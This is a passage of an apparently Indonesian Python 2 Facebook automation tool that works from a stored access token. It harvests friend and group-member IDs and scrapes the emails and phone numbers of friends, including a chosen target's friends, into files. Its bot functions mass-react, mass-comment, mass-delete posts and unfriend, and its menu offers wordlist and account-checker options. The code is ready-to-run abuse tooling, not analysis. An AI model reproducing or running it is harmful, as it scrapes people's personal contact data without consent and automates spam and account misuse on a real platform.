except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
